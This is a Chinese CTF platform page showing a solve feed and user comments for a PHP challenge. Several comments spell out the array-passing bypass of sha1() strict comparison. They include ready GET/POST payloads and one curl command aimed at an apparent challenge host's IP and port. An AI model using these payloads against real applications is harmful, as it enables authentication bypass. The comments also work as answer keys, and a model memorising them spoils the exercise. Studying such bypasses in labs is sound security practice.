评分(4)
解题动态
R1 攻破了该题 2小时前
226677 攻破了该题 4小时前
ws123 攻破了该题 5小时前
mybugku26 攻破了该题 10小时前
洋先森 攻破了该题 13小时前
纳百川. 攻破了该题 1天前
桉桉 攻破了该题 1天前
zzasas 攻破了该题 1天前
16suiTDT 攻破了该题 2天前
佳佳佳 攻破了该题 2天前
gdrhdr 攻破了该题 2天前
wen yi 攻破了该题 2天前
david666 攻破了该题 2天前
ZUOYOU_ 攻破了该题 2天前
徐日123 攻破了该题 3天前
1fengxinye 攻破了该题 3天前
Matrix_404 攻破了该题 3天前
邓邓邓 攻破了该题 3天前
孙笑川ᒿ58 攻破了该题 3天前
评论
脚本gay 1月前
举报
解题关键:PHP SHA1 函数漏洞 PHP 中,sha1() 函数无法处理数组,传入数组会返回 false,且是强类型的 false。 sha1(array()) → false sha1(array(1)) → false 两个不同数组,sha1 结果都是 false,满足 === 强相等 同时,数组和数组在 == 弱比较中不相等,完美绕过第一层判断!
是小白鸭 2月前
举报
明白咯 要在bp的repeater里面修改,get请求在头部,post请求在尾部。
奔跑的开开 6月前
举报
hackbar构造?uname[]=1&id=margin(get) ,passwd[]=2(post)
qq1002517 3月前
举报
6
5883120xly 7月前
举报
在url上加/?id=margin&uname[]=111a 在POST中加passwd[]=2
lwgzs 7月前
举报
curl -d '
dbcjmc 7月前
举报
这题其实很简单,要掌握MD5== 与===的特性就能轻松绕过去,在hackbar我们先传入get的?id=margin&uname[]=1然后再post传入passwd[]=2数组里面什么值都行===遇到数组都是null所以满足条件
zxcvbnmzhang 8月前
举报
curl -X POST "http://117.72.52.127:16987/?uname[]=a&id=margin" -d "passwd[]=b"
asddddd 9月前
举报
我用0e绕过sha1为啥不行,为什么只能数组绕过
ShawnWang04 7月前
举报
因为是=== 不是==
一个姓⎝李⎠的师傅~ 9月前
举报
题目挺好,各种细节和基础知识的考验,基础知识恶补: https://www.yuque.com/u21437924/ap9vtm/gqkc3dcfmfpe5p85?singleDoc#VbWHy
ubudj 9月前
举报
?uname[]=1&id=margin POST: passwd[]=2